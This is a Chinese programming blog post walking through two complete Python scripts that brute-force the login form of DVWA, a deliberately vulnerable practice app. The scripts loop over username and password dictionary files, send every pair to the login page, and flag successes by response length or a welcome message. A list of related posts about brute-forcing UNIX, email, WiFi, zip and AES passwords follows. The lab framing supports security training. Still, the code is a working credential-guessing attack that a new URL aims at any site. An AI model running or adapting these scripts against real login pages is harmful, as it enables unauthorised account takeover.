一个简单的Python暴力破解网站登录密码脚本

已于 2023-05-14 17:49:04 修改
阅读量2.4w 收藏 239
点赞数 35
分类专栏: DVWA笔记 Python脚本 文章标签: 安全 web安全 安全漏洞 Python脚本 python
于 2022-01-06 14:18:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/122342192
版权

目录:

测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等级

关键代码解释

url指定url地址

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"

header设置请求头

header = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie':'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}

payload设置请求参数

payload = {'username':username,'password':password,"Login":'Login'}

这一行的作用是作一次get请求,响应信息被变量Response接收

 Response = requests.get(url,params=payload,headers=header)

这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解

这种方式和burp的Intruder模块的Cluster bomb攻击方式一样

for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):

然后把循环结果存放到csv文件里,用逗号分割数据

Response.status_code 是响应的http状态码,len(Response.content) 是http响应报文的长度

result = str(Response.status_code) + ',' + username + ','\
	+ password + ',' + str(len(Response.content))
f.write(result + '\n')

完整代码

方法一

登陆成功的和失败返回数据不同,所以数据包长度也不同。包长度与其他不同的数据,可能就是正确的账号密码。

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理设置,方便burp抓包查看
header = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + '包长度' + '\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
        result = str(Response.status_code) + ',' + username + ','\
            + password + ',' + str(len(Response.content))
        f.write(result + '\n')
f.close()
print('\n完成')
运行结果

运行



这就是脚本发送的数据包

查看结果

查看包长度与其他不同的数据,登录测试

方法二

这个方法是根据登陆成功的返回特征来判断是否为正确的账号密码,然后把正确的账号密码输出到屏幕和txt文件里

主要改动在第17到20行

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"}  #代理设置,方便burp抓包查看
header = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
        if not(Response.text.find('Welcome to the password protected area')==-1):
            result = username + ':' + password
            print(result)
            f.write(result + '\n')
f.close()            
print('\n完成')
运行结果
CVE-柠檬i
关注
  • 35
    点赞
  • 239
    收藏
    觉得还不错? 一键收藏
  • 21
    评论
专栏目录
python 暴力破解密码脚本
weixin_34204722的博客
09-24 2275
python 暴力破解密码脚本 以下,仅为个人测试代码,环境也是测试环境,暴力破解原理都是一样的, 假设要暴力破解登陆网站www.a.com 用户 testUser的密码, 首先,该网站登陆的验证要支持 无限次的密码尝试 假设testUser 的密码为 6位的纯数字   1:先长成 6位纯数字密码字典 import os pds=[] rg=range(0,10)...
Python暴力破解网站登录密码脚本
xff123456_的博客
06-14 1850
测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等级关键代码解释url指定url地址 header设置请求头 payload设置请求参数 这一行的作用是做一次get请求,响应信息被变量Response接收 这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解这种方式和burp的Intruder模块的Cluster bomb攻击方式一样 然后把循环结果存放到csv文件里,用逗号分割数据Response.status_code是响应的http状态码,len(Response
Python开发:简单密码爆破工具
爱玩游戏的黑客的博客
05-29 1113
记得有大佬曾经说过:一个系统的突破往往是从弱口令开始,为了拿到弱口令我们就需要了解密码破解技术。密码破解主要分为离线密码破解和在线密码破解。在平时渗透时我们通常遇到的就是在线密码破解,破解对象包括各类系统服务以及各种网站应用,当我们面对rdp、ftp、ssh等服务,一般情况下可使用 hydra、超级弱口令爆破工具进行破解;而假如面对的是网站应用,最常用到的就是 BurpSuite、wfuzz。
验证码绕过暴力破解
最新发布
若谷的博客
07-16 1336
本实验中我们针对网站中的登录页面进行暴力破解,通过使用 Burpsuite 工具对网页进行暴力破解,体会学习暴力破解的基本过程,以及学习如何使用Burpsuite 工具。
轻松查看WiFi密码的神奇脚本,让你忘记密码也不再是问题
Twinkle_sone的博客
01-13 1986
🎈本文介绍了一个便捷的脚本,可以帮助你获取电脑中保存的所有Wi-Fi网络的密码。不再需要担心忘记Wi-Fi密码或手动查找密码的麻烦,只需运行脚本即可一键获取。
Python-暴力破解UNIX密码脚本
The Road Of Sec
09-30 852
# coding=UTF-8 """ 暴力破解UNIX的密码,需要输入字典文件和UNIX的密码文件 遍历整个字典,试图用常用的盐值来匹配破解哈希密码 """ import crypt def testPass(cryptPass): salt = cryptPass[0:2] dictfile = open('dictionary.txt', 'r') # 打开字典文件 ...
python暴力破解网站登录密码脚本
anzhengxv的博客
06-15 2282
简单对靶向网站进行暴力破解简单代码,url指向url的地址,header设置请求头(此处省略了)payload设置请求参数requests.post这一行的作用是作一次get请求,响应信息被变量Response接收通过for循环进行不断尝试完成破解......
轻松破解加密网页
编程爱好者
03-28 7944
作者:未知 来源:未知 2004-2-1 简单接触 <!--google_ad_client = "pub-6666369553852847";goog
Linux防暴力破解密码脚本
weixin_49763009的博客
07-20 395
为了避免被黑客暴力破解服务器密码,编写脚本将登入失败50次以上的IP封禁。写入定时任务,每分钟执行一次。查看ssh登入失败记录。
python可以破解网站吗_python变相破解校园网 - 『编程语言区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn...
weixin_39553705的博客
12-05 1400
本帖最后由 laoxiaodiao 于 2019-9-6 13:21 编辑校园网一直是坑爹一般的存在,别人都用上5G了,而我们学校却还停留在10块钱3个G的时代,也许你会说,用手机的流量就行了呀,但是学校有些资源还必须得要内网才能访问呀。然而我们知道,校园网的安全性根本就比不了那些公司,有很多大佬一直也在学校的学校的内网中遨游,我等只能膜拜,今天我们就一起来看看我是怎么变相破解校园网的。为什么说是...
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e...
暴力破解密码的代码
12-24
暴力破解密码的程序,学习如何操作其他窗口,尤其是那些忘记密码的。
网站密码暴力破解
10-05
网站密码暴力破解
Python暴力破解wifi密码.py
09-06
Python暴力破解wifi密码.py
Python实现在线暴力破解邮箱账号密码功能示例【测试可用】
01-20
本文实例讲述了Python实现在线暴力破解邮箱账号密码功能。分享给大家供大家参考,具体如下: dic 字典格式如下(mail.txt) : username@gmail.com:password username@gmail.com:password username@gmail.com:password...
python编写暴力破解zip文档程序的实例讲解
12-25
编写暴力破解Zip文件要从学习zipfile库的使用方法入手,首先打开Python解释器,用help(‘zipfile’)命令来了解这个库并重点看一下ZipFile类中的extractall()这个方法 ZipFile extractall() 让我们来写一个脚本...
Brute-Force-using-Python:使用python语言进行暴力破解脚本
07-11
要求: Python 版本 >= 2.7 模块机械化 - 有状态的程序化网页浏览模块插座模块 urlparse 模块 httplib 模块 cookielib 模块迭代工具如何使用: 假设有一个名为 example.com 的站点,它的表单在索引 0 处,并且有...
渗透用的python脚本密码破解
WHACKW的专栏
06-09 1489
FTP暴力破解脚本   ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
python aes 暴力破解脚本
05-01
暴力破解AES加密的密文需要大量的计算资源和时间,不是一般的脚本可以完成的。而且,暴力破解也不是一种良好的安全实践,因为它会暴露你的密码和密钥,而且可能会导致数据泄露和其他安全问题。 建议您不要使用暴力破解,而是使用更安全和可靠的加密方式和密钥管理方法来保护您的数据。 如果您仍然坚持需要编写AES暴力破解脚本,可以参考以下示例代码: ```python import itertools from Crypto.Cipher import AES # 定义加密算法 def encrypt(key, plain_text): cipher = AES.new(key, AES.MODE_ECB) return cipher.encrypt(plain_text) # 定义密文 cipher_text = '3f3b3a8b7d1b3a9f3f3b3a8b7d1b3a9f' # 定义密钥范围 key_range = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' # 枚举密钥并进行破解 for key_length in range(1, 9): for key in itertools.product(key_range, repeat=key_length): key = ''.join(key).encode('utf-8') result = encrypt(key, b'hello world').hex() if result == cipher_text: print('Found key: ', key) break ``` 该脚本使用了Python的itertools库来枚举密钥范围,然后使用Crypto库的AES模块进行加密。请注意,该脚本只是为了演示目的,实际上这种方式不太可能破解出AES加密的密文。
评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值